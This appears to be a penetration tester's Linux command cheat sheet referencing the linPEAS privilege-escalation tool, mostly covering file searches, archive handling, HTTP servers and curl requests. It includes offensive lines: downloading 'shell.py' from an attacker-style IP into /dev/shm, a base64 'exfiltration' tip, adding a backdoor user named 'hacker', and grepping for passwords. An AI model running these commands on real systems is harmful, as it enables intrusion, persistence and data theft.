Linux
PE Tool
Commands
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng
GitHub
#Exfiltration using Base64
base64 -w 0 file
#find a file
find -maxdepth 1
find ./ -type f
find ./ -type d
find ./ -name abc*
grep -lR password *.txt
find ./ -name webmin 2>/dev/null
#query file grep functions
cut –d ":" -f 1 /etc/passwd
echo "hello::there::firend" | awk –F "::" '{print $1, $3}'
cat access.log | cut –d " " -f 1 | sort | uniq –c |sort –urn
#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'
#Count
wc -l <file> #Lines
wc -c #Chars
#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates
#Compare File
comm fileA.txt fileB.txt
#Download
wget 10.10.14.14:8000/shell.py
curl -vvv 'https://10.10.14.14:8000/shell.py' -b "cookie" -k -o /dev/shm/shell.py
-k => tag in the end to disable ssl checks done by curl
#Unzipp
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z -x file.7z
sudo apt-get install xz-utils; unxz file.xz
#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker
#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80
##Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
#Send Email
sendEmail -t [email protected] -f [email protected] -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob
Copy link